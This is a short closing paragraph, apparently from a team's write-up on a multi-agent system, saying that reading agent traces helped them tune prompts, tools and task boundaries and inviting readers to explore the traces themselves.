This was just a quick summary of a few interesting pieces of some of the agent traces from our system. During development, we found reading through these logs to be incredibly useful for adjusting prompts, tools, and work boundaries between different parts of our system. Our team still has not been able to look through every trace for every agent. We encourage you to explore the traces for yourself and see what insights you can take away! If you notice anything particularly interesting, please let us know!